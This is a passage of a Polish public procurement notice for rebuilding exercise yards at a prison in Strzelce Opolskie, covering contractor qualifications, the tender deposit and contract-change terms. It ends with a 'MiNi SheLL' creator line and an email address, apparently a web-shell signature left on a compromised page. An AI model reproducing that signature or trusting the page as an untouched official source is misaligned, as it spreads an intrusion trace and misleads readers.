(na każdą część zamówienia) i na żądanie zamawiającego przedstawi dokument potwierdzający ten fakt.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych dotyczących sytuacji ekonomicznej lub finansowej, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnienie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>4) zdolności technicznej lub zawodowej- zamawiający uzna, że wykonawca spełnia warunek w zakresie posiadania odpowiedniej zdolności technicznej lub zawodowej niezbędnej do realizacji zamówienia jeżeli:<br/>a) wykaże, że w okresie ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwie roboty budowlane odpowiadające przedmiotowi zamówienia lub podobnego rodzaju na kwotę nie mniejszą niż 500 000,00 zł każda oraz potwierdzi, że roboty budowlane zostały wykonane należycie i na żądanie zamawiającego przedstawi wykaz robót wraz z referencjami,<br/>b) wykaże, że będzie dysponował osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają odpowiednie uprawnienia i kwalifikacje do pełnienia samodzielnych funkcji technicznych w budownictwie:<br/>kierownik budowy – posiadający ważne uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz posiadający co najmniej 3 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy.<br/>Wykonawca na żądanie zamawiającego przedstawi wykaz osób, skierowanych do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wraz z wykazem wykonawca przedłoży zamawiającemu wszystkie uprawnienia, certyfikaty, zaświadczenia itp. dotyczące osób skierowanych do realizacji zamówienia, o których mowa powyżej. Zamawiający dopuszcza zmianę osób skierowanych do realizacji zamówienia na etapie jego realizacji, jeżeli Wykonawca wykaże, iż zgłaszane osoby posiadają kwalifikacje nie mniejsze niż opisane w SWZ.<br/>UWAGA<br/>1) Uprawnienia do pełnienia samodzielnych funkcji w budownictwie, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie.<br/>2) Dopuszcza się uprawnienia równoważne - dla osoby, która posiada uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane, uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>3) Osoby będące obywatelami krajów członkowskich Unii Europejskiej, od których wymagane są stosowne uprawnienia budowlane, powinny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z Ustawą z dnia 22 grudnia 2015 r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej . W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych na potwierdzenie:<br/>Spełnienia warunków udziału w postępowaniu:<br/>- dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 500 000,00 zł (na każdą część zamówienia),<br/>- wykazu robót budowlanych (zał. nr 7 do SWZ) - wykonanych co najmniej dwóch robót budowlanych odpowiadających przedmiotowi zamówienia lub podobnego rodzaju na kwotę nie mniejszą niż 500 000,00 zł każda, wykonanych nie wcześniej niż w okresie ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;<br/>- wykazu osób (opisanych w pkt 19 ust. 4b, zał. nr 8 do SWZ ) - skierowanych do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych środków.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 23 - Wymagania dotyczące wadium<br/>Nazwa części<br/>Wysokość wadium<br/>część 1 - przebudowa placu spacerowego przy pawilonie A w Zakładzie Karnym nr 2 w Strzelcach Opolskich, <br/>13 000,00 zł <br/>(trzynaście tysięcy złotych 00/100)<br/> część 2 - przebudowa placu spacerowego przy pawilonie B w Zakładzie Karnym nr 2 w Strzelcach Opolskich, <br/>13 000,00 zł <br/>(trzynaście tysięcy złotych 00/100)<br/>1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w odpowiedniej kwocie do danej części zamówienia.<br/>2) Wadium musi obejmować pełen okres związania ofertą.<br/>3) Wadium może być wniesione według wyboru wykonawcy w jednej lub kilku formach wskazanych poniżej :<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4) Wadium wnoszone w pieniądzu, przelewem na nieoprocentowane konto bankowe Zakładu Karnego Nr 2 w Strzelcach Opolskich - NBP o/Opole numer konta: <br/>69 1010 1401 0053 9513 9120 0000 <br/>z adnotacją: ”Wadium – przetarg na „Przebudowa placów spacerowych przy pawilonie A i B w Zakładzie Karnym nr 2 w Strzelcach Opolskich – DKw.2232.6.2021.RK”, odpowiednio do części zamówienia. W ofercie należy podać numer konta Wykonawcy, na które Zamawiający zwróci wadium jeśli zostało wniesione w pieniądzu,<br/>5) Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>- nazwę wykonawcy, beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zakład Karny nr 2 w Strzelcach opolskich, 47-100 Strzelce Opolskie, ul. Klonowa 3.<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>- wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>Wymagana forma: wykonawcy składają oświadczenia w formie elektronicznej podpisane<br/>kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców<br/>zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej lub innym dokumencie. W przypadku gdy oświadczenie zostało sporządzone jako<br/>dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, a w<br/>przypadku postępowań lub konkursów, o wartości mniejszej niż progi unijne, kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym<br/>zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia<br/>zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje<br/>odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia lub<br/>notariusz <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość<br/>dokonania następujących zmian postanowień Umowy:<br/>1) zmiany wynagrodzenia umownego w przypadku gdy:<br/>a) zmianie ulegnie urzędowa stawka podatku od towarów i usług -Zamawiający dopuszcza<br/>możliwość zmiany wartości wynagrodzenia umownego w zakresie wartości brutto;<br/>b) zmianie ulegnie zakres robót objętych niniejszą umową z przyczyn, których nie można było<br/>przewidzieć w chwili zawarcia umowy wraz z odpowiednim zmniejszeniem wynagrodzenia<br/>umownego,<br/>2) zmiany wielkości zakresu przedmiotu zamówienia z powodu niezrealizowania pełnego<br/>zakresu przedmiotu zamówienia w sytuacjach, których, nie można było przewidzieć w chwili<br/>zawarcia umowy, w szczególności w razie nieprzewidywanego i niezawinionego przez<br/>Zamawiającego braku środków finansowych na realizację całości lub części umowy,<br/>3) zmiany terminu wykonania zamówienia z powodu:<br/>a) wystąpienia warunków atmosferycznych uniemożliwiających prowadzenie zamówień/robót<br/>Ogłoszenie nr 2021/BZP 00106001/01 z dnia 2021-07-06<br/>2021-07-06 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>budowlanych zgodnie z technologią ich wykonania (w tym o charakterze siły wyższej) -<br/>przedłużenie o okres niemożliwości realizacji umowy;<br/>b) przedłużenia terminu realizacji zamówienia podstawowego na skutek konieczności wykonania<br/>zamówień/robót, dostaw, usług dodatkowych, nie objętych zamówieniem podstawowym, których<br/>wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego<br/>przedmiotu<br/>zamówienia;<br/>c) wynikłych ze zmiany obowiązujących przepisów prawa, co powoduje konieczność<br/>dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji<br/>zamówienia;<br/>d) z powodu działań lub zaniechania Zamawiającego;<br/>e) z powodu nie otrzymania stosownych decyzji od innych organów publicznych;<br/>f) wskutek wystąpienia okoliczności niezależnych od stron umowy związanych z koniecznością<br/>zmiany okresu realizacji umowy,<br/>g) wystąpienia awarii (innej przeszkody) nie zawinionej czynnościami lub nie wynikającej z<br/>zaniechania czynności przez Wykonawcę – przedłużenie terminów realizacji umowy o czas<br/>niezbędny na usunięcie awarii (przeszkody) oraz podjęcie dalszej prawidłowej realizacji<br/>zamówienia;<br/>h) konieczności wykonania zamiennych robót budowlanych w stosunku do robót będących<br/>przedmiotem umowy lub odstąpienia przez Zamawiającego od realizacji ich części – zmiana w<br/>zakresie niezbędnym do prawidłowego wykonania przedmiotu Umowy wraz ze zmianą<br/>wynagrodzenia należnego Wykonawcy (na podstawie zamiennego przedmiaru robót);<br/>4) zmiany sposobu spełnienia świadczenia, zmiana parametrów realizowanego zamówienia w<br/>szczególności w przypadku konieczności realizacji projektu przy zastosowaniu innych rozwiązań<br/>technicznych i technologicznych lub materiałowych niż wskazane w dokumentacji zamówienia;<br/>5) zmiany będą korzystne dla Zamawiającego i nie będą miały charakteru naruszenia zasad<br/>konkurencji i równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był<br/>przewidziany w postanowieniach pierwotnego zamówienia oraz zmiany nie będą istotne w<br/>rozumieniu art. 454 ust. 1, 2 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-12 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-12 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com